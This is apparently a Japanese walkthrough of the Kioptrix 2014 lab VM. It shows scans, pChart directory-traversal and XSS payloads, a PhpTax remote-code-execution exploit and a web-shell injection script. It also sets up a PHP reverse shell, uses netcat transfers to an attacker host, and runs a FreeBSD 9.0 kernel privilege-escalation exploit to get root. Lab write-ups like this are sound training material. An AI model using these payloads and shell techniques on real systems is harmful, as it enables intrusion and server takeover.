08:23:20 (GMT-4) (98 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.8 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Apr 30 08:29:52 2020 URL_BASE: http://10.10.10.8/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.8/ ---- + http://10.10.10.8/cgi-bin/ (CODE:403|SIZE:210) + http://10.10.10.8/index.html (CODE:200|SIZE:152) ----------------- END_TIME: Thu Apr 30 08:30:18 2020 DOWNLOADED: 4612 - FOUND: 2
「CVE-2002-0082」ってkioptrix1でもあった気がするが刺さるのか?
どうやらapacheのバージョンが一致しないので刺さらないらしい。
Apacheのバージョンにも何も無さそうだし、phpにも何も無いので詰みかぁ。
と思ったがindex.htmlのソースを見てみると
<html> <head> <!-- <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> --> </head> <body> <h1>It works!</h1> </body> </html>
「pChart2.1.3/index.php」?
アクセスする。
何か管理画面ぽいのが出てきた。
# searchsploit pChart 2.1 --------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------- ---------------------------------------- pChart 2.1.3 - Multiple Vulnerabilitie | exploits/php/webapps/31173.txt --------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result # cat /usr/share/exploitdb/exploits/php/webapps/31173.txt # Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS # Date: 2014-01-24 # Exploit Author: Balazs Makany # Vendor Homepage: www.pchart.net # Software Link: www.pchart.net/download # Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3" # Version: 2.1.3 # Tested on: N/A (Web Application. Tested on FreeBSD and Apache) # CVE : N/A [0] Summary: PHP library pChart 2.1.3 (and possibly previous versions) by default contains an examples folder, where the application is vulnerable to Directory Traversal and Cross-Site Scripting (XSS). It is plausible that custom built production code contains similar problems if the usage of the library was copied from the examples. The exploit author engaged the vendor before publicly disclosing the vulnerability and consequently the vendor released an official fix before the vulnerability was published. [1] Directory Traversal: "hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd" The traversal is executed with the web server's privilege and leads to sensitive file disclosure (passwd, siteconf.inc.php or similar), access to source codes, hardcoded passwords or other high impact consequences, depending on the web server's configuration. This problem may exists in the production code if the example code was copied into the production environment. Directory Traversal remediation: 1) Update to the latest version of the software. 2) Remove public access to the examples folder where applicable. 3) Use a Web Application Firewall or similar technology to filter malicious input attempts. [2] Cross-Site Scripting (XSS): "hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script> This file uses multiple variables throughout the session, and most of them are vulnerable to XSS attacks. Certain parameters are persistent throughout the session and therefore persists until the user session is active. The parameters are unfiltered. Cross-Site Scripting remediation: 1) Update to the latest version of the software. 2) Remove public access to the examples folder where applicable. 3) Use a Web Application Firewall or similar technology to filter malicious input attempts. [3] Disclosure timeline: 2014 January 16 - Vulnerability confirmed, vendor contacted 2014 January 17 - Vendor replied, responsible disclosure was orchestrated 2014 January 24 - Vendor was inquired about progress, vendor replied and noted that the official patch is released.
色々あるみたいなのでやってみる。
firefoxから「http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd」へのアクセス # $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin
firefoxにて、↑のディレクトリトラバーサルと
http://10.10.10.8/pChart2.1.3/examples/sandbox/script/session.php?<script>alert('XSS')</script>
の発火を確認。
ディレクトリトラバーサルできるけど何見れば良いか分からん。
そういや、dirbで403出てるディレクトリあったのでそこにアクセス制御してそうな「.htaccess」とか「httpd.conf」でも見てみるか。
「.htaccess」は無いっぽい。
「 /etc/httpd/conf/httpd.conf」無い?
「/usr/local/apache2/conf/」でもない?
そういえばhttpd.confってOSごとに場所違った気がするので、今回FreeBSDだし違うとこにありそう。
推測参考 FreeBSDでApacheのインストールと起動 - Qiita
今回はApache 2.2.xなので、「/usr/local/etc/apache22/httpd.conf」と予測。
firefoxで「http://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf」へアクセス # # This is the main Apache HTTP server configuration file. It contains the # configuration directives that give the server its instructions. # See <URL:http://httpd.apache.org/docs/2.2> for detailed information. # In particular, see # <URL:http://httpd.apache.org/docs/2.2/mod/directives.html> # for a discussion of each configuration directive. # # Do NOT simply read the instructions in here without understanding # what they do. They're here only as hints or reminders. If you are unsure # consult the online docs. You have been warned. # # Configuration and logfile names: If the filenames you specify for many # of the server's control files begin with "/" (or "drive:/" for Win32), the # server will use that explicit path. If the filenames do *not* begin # with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log" # with ServerRoot set to "/usr/local" will be interpreted by the # server as "/usr/local//var/log/foo_log". # # ServerRoot: The top of the directory tree under which the server's # configuration, error, and log files are kept. # # Do not add a slash at the end of the directory path. If you point # ServerRoot at a non-local disk, be sure to point the LockFile directive # at a local disk. If you wish to share the same ServerRoot for multiple # httpd daemons, you will need to change at least LockFile and PidFile. # ServerRoot "/usr/local" # # Listen: Allows you to bind Apache to specific IP addresses and/or # ports, instead of the default. See also the <VirtualHost> # directive. # # Change this to Listen on specific IP addresses as shown below to # prevent Apache from glomming onto all bound IP addresses. # #Listen 12.34.56.78:80 Listen 80 Listen 8080 (snip) # "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased # CGI directory exists, if you have that configured. # <Directory "/usr/local/www/apache22/cgi-bin"> AllowOverride None Options None Order allow,deny Allow from all </Directory> (snip) SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser <VirtualHost *:8080> DocumentRoot /usr/local/www/apache22/data2 <Directory "/usr/local/www/apache22/data2"> Options Indexes FollowSymLinks AllowOverride All Order allow,deny Allow from env=Mozilla4_browser </Directory> </VirtualHost> Include etc/apache22/Includes/*.conf
ちゃんとありました。
やはり、httpd.confでアクセス制御をしていたようで。
port 8080もアクセス制御がされているようだけど、「Mozilla4_browser」だけアクセスできる?
# curl -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /</title> </head> <body> <h1>Index of /</h1> <ul><li><a href="phptax/"> phptax/</a></li> </ul> </body></html>
phptax?
# searchsploit phptax ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit) | exploits/php/webapps/21833.rb PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution | exploits/php/webapps/25849.txt phptax 0.8 - Remote Code Execution | exploits/php/webapps/21665.txt ----------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
metasploitは使いたくない。
でもphptaxのバージョン分からんし一か八か試すか?
しかし調べてみたところ、ver0.8が最新バージョンぽい?
そうだとしたらガバガバセキュリティだが、それにかける。
新しい方の、25849.txtでチャレンジ。
# cat /usr/share/exploitdb/exploits/php//webapps/25849.txt # # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground Hacking Team .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / `\ / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # Exploit Title : PhpTax File Manipulation(newvalue,field) Remote Code Execution # Date : 31 May 2013 # Exploit Author : CWH Underground # Site : www.2600.in.th # Vendor Homepage : http://phptax.sourceforge.net/ # Software Link : http://sourceforge.net/projects/phptax/ # Version : 0.8 # Tested on : Window and Linux ##################################################### #VULNERABILITY: FILE MANIPULATION TO REMOTE COMMAND EXECUTION ##################################################### #index.php #LINE 32: fwrite fwrite($zz, "$_GET['newvalue']"); #LINE 31: $zz = fopen("./data/$field", "w"); #LINE 2: $field = $_GET['field']; ##################################################### #DESCRIPTION ##################################################### #An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability. #User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. #An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server. ##################################################### #EXPLOIT ##################################################### <?php $options = getopt('u:'); if(!isset($options['u'])) die("\n Usage example: php exploit.php -u http://target.com/ \n"); $url = $options['u']; $shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E"; $headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$url}/data/rce.php?cmd=id\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?> ################################################################################################################ # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################
テキストだけかと思ったがちゃんとexploitついている。
「/phptax/index.php」の「2,31,32行目」に問題があるからexploitできるということか。
心配なので一応「usr/local/apache22//phptax/index.php」を確認。
# curl -vI -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080/phptax/index.php * Trying 10.10.10.8:8080... * TCP_NODELAY set * Connected to 10.10.10.8 (10.10.10.8) port 8080 (#0) > GET /phptax/index.php HTTP/1.1 > Host: 10.10.10.8:8080 > Accept: */* > User-Agent:Mozilla/4.0 > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK HTTP/1.1 200 OK < Date: Fri, 01 May 2020 03:44:35 GMT Date: Fri, 01 May 2020 03:44:35 GMT < Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 < X-Powered-By: PHP/5.3.8 X-Powered-By: PHP/5.3.8 < Transfer-Encoding: chunked Transfer-Encoding: chunked < Content-Type: text/html Content-Type: text/html < * Excess found: excess = 4131 url = /phptax/index.php (zero-length body) * Connection #0 to host 10.10.10.8 left intact
firefoxで「http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/www/apache22/data2/phptax/index.php」へアクセス。 ファイルのありかは「httpd.conf」から分かる。 <?php $field=$_GET[field]; (snip) if ($_GET[newvalue]) { $zz=fopen("./data/$field","w"); fwrite($zz,"$_GET[newvalue]"); fclose($zz); } (snip)
ということで、「25849.txt」にならってexploitコードを書き換えれば良いと言うことか。
# cp /usr/share/exploitdb/exploits/php//webapps/25849.txt phptax_exploit.php
このexploit使おうとしたら「curl_init()」知らないと怒られたので入れる。
# php -v PHP 7.3.15-3 (cli) (built: Feb 23 2020 07:15:44) ( NTS ) (snip) # apt install php7.3-curl
よっしゃこれでいけるか。
# php phptax_exploit.php -u http://10.10.10.8:8080/phptax (snip) ##################################################### #EXPLOIT ##################################################### [+] Submitting request to: http://10.10.10.8:8080/phptax [+] Exploit was unsuccessful.
はい。ダメです。
もう分からんからシェルスクリプトで書き直す。
# !/bin/sh # ./phptax_exploit.sh # phptax < ver 0.8 exploit # vulncode in phptax/index.php # $field = $_GET['field']; in line 2 # $zz = fopen("./data/$field", "w"); in line 31 # fwrite fwrite($zz, "$_GET['newvalue']"); in line 32 target_site_to_phptax_index_path="$1" #example "http://10.10.10.8:8080/phptax/" remote_code="$2" #example "id" URLencode!!!! space is "%20" curl -vI -H "User-Agent:Mozilla/4.0" "$1/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E" echo -e "\n" curl -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/rce.php?cmd=$2"
適当に書いたから許して。
何故かここからreverse shellに苦戦。
結局上手くいったのは、reverse shellするphpを送り付けて実行するパターン。
php-reverse-shellがkaliの場合ある # cp /usr/share/webshells/php/php-reverse-shell.php reverse.php #### ここら辺変える $VERSION = "1.0"; $ip = '10.10.10.3'; // CHANGE THIS $port = 443; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0;
window 1 # nc -nlvp 8080 < reverse.php
window 2 # ./phptax_exploit.sh http://10.10.10.8:8080/phptax nc%2010.10.10.3%208080%20%3E%20reverse.php%20\&
window 1 # nc -nlvp 443
windows 2 # curl -v -XGET -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/reverse.php
やっとシェル取れた。
$ id uid=80(www) gid=80(www) groups=80(www) $ uname -a FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
FreeBSD 9.0は果たしてあるか。
# searchsploit FreeBSD 9.0 ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation | exploits/freebsd/local/28718.c FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation | exploits/freebsd/local/26368.c ----------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
ちょうど良さそうなのがあるので、「28718.c」を試す。
# cp /usr/share/exploitdb/exploits/freebsd/local/28718.c freebsd9.0_priv.c
このプログラムは改行無いと怒られたので改行忘れずに。
victim $ wget http://10.10.10.3/freebsd9.0_priv.c wget: not found
マジか。
またncでファイルやりとりするか。
attacker # nc -nlvp 8080 < freebsd9.0_priv.c
victim $ cd /tmp $ nc 10.10.10.3 8080 > priv.c $ gcc priv.c $ ./a.out [+] SYSRET FUCKUP!! [+] Start Engine... [+] Crotz... [+] Crotz... [+] Crotz... [+] Woohoo!!! $ id uid=0(root) gid=0(wheel) groups=0(wheel) $ cd /root $ ls .cshrc .history .k5login .login .mysql_history .profile congrats.txt folderMonitor.log httpd-access.log lazyClearLog.sh monitor.py ossec-alerts.log $ cat congrats.txt If you are reading this, it means you got root (or cheated). Congratulations either way... Hope you enjoyed this new VM of mine. As always, they are made for the beginner in mind, and not meant for the seasoned pentester. However this does not mean one can't enjoy them. As with all my VMs, besides getting "root" on the system, the goal is to also learn the basics skills needed to compromise a system. Most importantly, in my mind, are information gathering & research. Anyone can throw massive amounts of exploits and "hope" it works, but think about the traffic.. the logs... Best to take it slow, and read up on the information you gathered and hopefully craft better more targetted attacks. For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly. Knowing the OS gives you any idea of what will work and what won't from the get go. Default file locations are not the same on FreeBSD versus a Linux based distribution. Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log". It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data". Finding and knowing these little details will greatly help during an attack. Of course my examples are specific for this target, but the theory applies to all systems. As a small exercise, look at the logs and see how much noise you generated. Of course the log results may not be accurate if you created a snapshot and reverted, but at least it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things. Default settings, nothing fancy but it should've logged a few of your attacks. Look at the following files: /root/folderMonitor.log /root/httpd-access.log (softlink) /root/ossec-alerts.log (softlink) The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS for this. The httpd-access.log is rather self-explanatory . Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain files. This one should've detected a few of your web attacks. Feel free to explore the system and other log files to see how noisy, or silent, you were. And again, thank you for taking the time to download and play. Sincerely hope you enjoyed yourself. Be good... loneferret http://www.kioptrix.com p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've blocked your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to remove that part :)
やったぜ。
終わり
exploitコードが改行無いのはデフォ?